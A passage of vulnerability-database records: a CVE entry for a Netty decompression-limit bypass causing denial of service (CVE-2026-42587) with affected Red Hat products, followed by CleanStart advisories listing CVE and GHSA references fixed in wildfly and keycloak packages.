[\"cpe:/a:redhat:amq_streams:2.9::el9\"], \"vendor\": \"Red Hat\", \"product\": \"Streams for Apache Kafka 2.9.4\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:cryostat:4\"], \"vendor\": \"Red Hat\", \"product\": \"Cryostat 4\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:serverless:1\"], \"vendor\": \"Red Hat\", \"product\": \"OpenShift Serverless\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:amq_broker:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat AMQ Broker 7\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:amq_clients:2023\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat AMQ Clients\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:camel_spring_boot:4\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Apache Camel for Spring Boot 4\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:service_registry:2\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Apicurio Registry 2\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:apicurio_registry:3\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Apicurio Registry 3\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:debezium:3\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Debezium 3\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:build_keycloak:\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Build of Keycloak\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:optaplanner:::el6\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of OptaPlanner 8\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_data_grid:8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Data Grid 8\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_fuse:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Fuse 7\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_enterprise_application_platform:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat JBoss Enterprise Application Platform 7\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_enterprise_application_platform:8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat JBoss Enterprise Application Platform 8\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jbosseapxp\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat JBoss Enterprise Application Platform Expansion Pack\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:openshift_ai\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat OpenShift AI (RHOAI)\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:openshift_devspaces:3\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat OpenShift Dev Spaces\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_enterprise_bpms_platform:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Process Automation 7\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:red_hat_single_sign_on:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Single Sign-On 7\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:amq_streams:2\"], \"vendor\": \"Red Hat\", \"product\": \"streams for Apache Kafka 2\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:amq_streams:3\"], \"vendor\": \"Red Hat\", \"product\": \"streams for Apache Kafka 3\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:camel_quarkus:3\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Apache Camel 4 for Quarkus 3\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:enterprise_linux_ai:3\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Enterprise Linux AI (RHEL AI) 3\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:satellite:6\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Satellite 6\", \"defaultStatus\": \"unaffected\"}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2026-05-13T19:01:35.415Z\", \"value\": \"Reported to Red Hat.\"}, {\"lang\": \"en\", \"time\": \"2026-05-13T18:22:21.699Z\", \"value\": \"Made public.\"}], \"solutions\": [{\"lang\": \"en\", \"value\": \"RHSA-2026:28010: Cryostat 4 on RHEL 9\"}, {\"lang\": \"en\", \"value\": \"RHSA-2026:25123: Red Hat OpenShift Dev Spaces 3.28\"}, {\"lang\": \"en\", \"value\": \"RHSA-2026:23808: Red Hat build of Quarkus 3.27.4\"}, {\"lang\": \"en\", \"value\": \"RHSA-2026:24502: Red Hat build of Quarkus 3.33.2\"}, {\"lang\": \"en\", \"value\": \"RHSA-2026:34608: Streams for Apache Kafka 2.9.4\"}], \"x_adpType\": \"supplier\", \"datePublic\": \"2026-05-13T18:22:21.699Z\", \"references\": [{\"url\": \"https://access.redhat.com/security/cve/CVE-2026-42587\", \"tags\": [\"vdb-entry\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://bugzilla.redhat.com/show_bug.cgi?id=2477220\", \"name\": \"RHBZ#2477220\", \"tags\": [\"issue-tracking\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42587.json\", \"tags\": [\"x_sadp-csaf-vex\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:28010\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:25123\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:23808\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:24502\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:34608\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}], \"workarounds\": [{\"lang\": \"en\", \"value\": \"Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.\"}], \"x_generator\": {\"engine\": \"sadp-cli 1.0.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\", \"shortName\": \"redhat-SADP\", \"dateUpdated\": \"2026-07-03T12:04:48.821Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42587\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-13T18:43:31.138358Z\"}}}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-13T18:43:47.099Z\"}}], \"cna\": {\"title\": \"Netty: HttpContentDecompressor maxAllocation bypass via Content-Encoding: br/zstd/snappy enables decompression bomb DoS\", \"source\": {\"advisory\": \"GHSA-f6hv-jmp6-3vwv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"netty\", \"product\": \"netty\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.1.133.Final\"}]}, {\"vendor\": \"io.netty\", \"product\": \"netty-codec-http\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.1.133.Final\"}]}, {\"vendor\": \"io.netty\", \"product\": \"netty-codec-http2\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.1.133.Final\"}]}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\", \"name\": \"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-13T18:22:21.699Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-42587\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-07-03T12:04:48.821Z\", \"dateReserved\": \"2026-04-28T17:26:12.086Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-13T18:22:21.699Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
cleanstart-2026-ru36468
Vulnerability from cleanstart
Multiple security vulnerabilities affect the wildfly package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "wildfly"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "39.0.1-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the wildfly package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-RU36468",
"modified": "2026-06-04T05:30:36Z",
"published": "2026-06-08T14:00:50.454920Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-RU36468.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-0636"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-3260"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33558"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-3505"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35554"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42402"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42403"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42404"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5598"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-287c-fxr7-3w6c"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2hfh-9h53-qc24"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38f8-5428-x5cv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-45q3-82m4-75jr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-57rv-r2g8-2cj3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5qcv-4rpc-jp93"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72hv-8253-57qq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c3fc-8qff-9hwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cj8j-37rh-8475"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cm33-6792-r9fm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f6hv-jmp6-3vwv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-g36m-9g3m-2vmp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m4cv-j2px-7723"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mj4r-2hfc-f8p6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p93r-85wp-75v3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pwqr-wmgm-9rr8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v8h7-rr48-vmmv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w9fj-cfpg-grvv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wf66-mphr-4c4r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wg6q-6289-32hp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xxqh-mfjm-7mv9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0636"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3260"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33558"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3505"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35554"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42402"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42403"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42404"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5598"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2026-0636, CVE-2026-3260, CVE-2026-33558, CVE-2026-33870, CVE-2026-33871, CVE-2026-3505, CVE-2026-35554, CVE-2026-41417, CVE-2026-42402, CVE-2026-42403, CVE-2026-42404, CVE-2026-42578, CVE-2026-42579, CVE-2026-42580, CVE-2026-42581, CVE-2026-42583, CVE-2026-42584, CVE-2026-42585, CVE-2026-42587, CVE-2026-5588, CVE-2026-5598, ghsa-287c-fxr7-3w6c, ghsa-2hfh-9h53-qc24, ghsa-38f8-5428-x5cv, ghsa-45q3-82m4-75jr, ghsa-57rv-r2g8-2cj3, ghsa-5qcv-4rpc-jp93, ghsa-72hv-8253-57qq, ghsa-c3fc-8qff-9hwx, ghsa-cj8j-37rh-8475, ghsa-cm33-6792-r9fm, ghsa-f6hv-jmp6-3vwv, ghsa-g36m-9g3m-2vmp, ghsa-m4cv-j2px-7723, ghsa-mj4r-2hfc-f8p6, ghsa-p93r-85wp-75v3, ghsa-pwqr-wmgm-9rr8, ghsa-v8h7-rr48-vmmv, ghsa-w9fj-cfpg-grvv, ghsa-wf66-mphr-4c4r, ghsa-wg6q-6289-32hp, ghsa-xxqh-mfjm-7mv9 applied in versions: 39.0.1-r0",
"upstream": [
"CVE-2026-0636",
"CVE-2026-3260",
"CVE-2026-33558",
"CVE-2026-33870",
"CVE-2026-33871",
"CVE-2026-3505",
"CVE-2026-35554",
"CVE-2026-41417",
"CVE-2026-42402",
"CVE-2026-42403",
"CVE-2026-42404",
"CVE-2026-42578",
"CVE-2026-42579",
"CVE-2026-42580",
"CVE-2026-42581",
"CVE-2026-42583",
"CVE-2026-42584",
"CVE-2026-42585",
"CVE-2026-42587",
"CVE-2026-5588",
"CVE-2026-5598",
"ghsa-287c-fxr7-3w6c",
"ghsa-2hfh-9h53-qc24",
"ghsa-38f8-5428-x5cv",
"ghsa-45q3-82m4-75jr",
"ghsa-57rv-r2g8-2cj3",
"ghsa-5qcv-4rpc-jp93",
"ghsa-72hv-8253-57qq",
"ghsa-c3fc-8qff-9hwx",
"ghsa-cj8j-37rh-8475",
"ghsa-cm33-6792-r9fm",
"ghsa-f6hv-jmp6-3vwv",
"ghsa-g36m-9g3m-2vmp",
"ghsa-m4cv-j2px-7723",
"ghsa-mj4r-2hfc-f8p6",
"ghsa-p93r-85wp-75v3",
"ghsa-pwqr-wmgm-9rr8",
"ghsa-v8h7-rr48-vmmv",
"ghsa-w9fj-cfpg-grvv",
"ghsa-wf66-mphr-4c4r",
"ghsa-wg6q-6289-32hp",
"ghsa-xxqh-mfjm-7mv9"
]
}
cleanstart-2026-vj37814
Vulnerability from cleanstart
Multiple security vulnerabilities affect the keycloak package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "keycloak"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.4.11-r2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the keycloak package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-VJ37814",
"modified": "2026-05-07T10:32:20Z",
"published": "2026-05-18T13:37:33.552809Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-VJ37814.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-59250"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1002"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39852"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42198"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42577"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5598"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38f8-5428-x5cv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p8m-j85q-pgmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-45p5-v273-3qqr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-45q3-82m4-75jr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4cx2-fc23-5wg6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-57rv-r2g8-2cj3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9342-92gg-6v29"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-98qh-xjc8-98pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c3fc-8qff-9hwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cm33-6792-r9fm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cphf-4846-3xx9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fghv-69vj-qj49"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h5fg-jpgr-rv9c"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hq9p-pm7w-8p54"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j288-q9x7-2f5v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m4cv-j2px-7723"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mj4r-2hfc-f8p6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p93r-85wp-75v3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pwqr-wmgm-9rr8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rc95-pcm8-65v9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rwm7-x88c-3g2p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v8h7-rr48-vmmv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w9fj-cfpg-grvv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wg6q-6289-32hp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xxqh-mfjm-7mv9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59250"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39852"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42198"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42577"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5598"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-59250, CVE-2026-1002, CVE-2026-33870, CVE-2026-33871, CVE-2026-39852, CVE-2026-41417, CVE-2026-42198, CVE-2026-42577, CVE-2026-42578, CVE-2026-42579, CVE-2026-42580, CVE-2026-42581, CVE-2026-42583, CVE-2026-42584, CVE-2026-42585, CVE-2026-42587, CVE-2026-5588, CVE-2026-5598, ghsa-38f8-5428-x5cv, ghsa-3p8m-j85q-pgmj, ghsa-45p5-v273-3qqr, ghsa-45q3-82m4-75jr, ghsa-4cx2-fc23-5wg6, ghsa-57rv-r2g8-2cj3, ghsa-9342-92gg-6v29, ghsa-98qh-xjc8-98pq, ghsa-c3fc-8qff-9hwx, ghsa-cm33-6792-r9fm, ghsa-cphf-4846-3xx9, ghsa-fghv-69vj-qj49, ghsa-h5fg-jpgr-rv9c, ghsa-hq9p-pm7w-8p54, ghsa-j288-q9x7-2f5v, ghsa-m4cv-j2px-7723, ghsa-mj4r-2hfc-f8p6, ghsa-p93r-85wp-75v3, ghsa-pwqr-wmgm-9rr8, ghsa-rc95-pcm8-65v9, ghsa-rwm7-x88c-3g2p, ghsa-v8h7-rr48-vmmv, ghsa-w9fj-cfpg-grvv, ghsa-wg6q-6289-32hp, ghsa-xxqh-mfjm-7mv9 applied in versions: 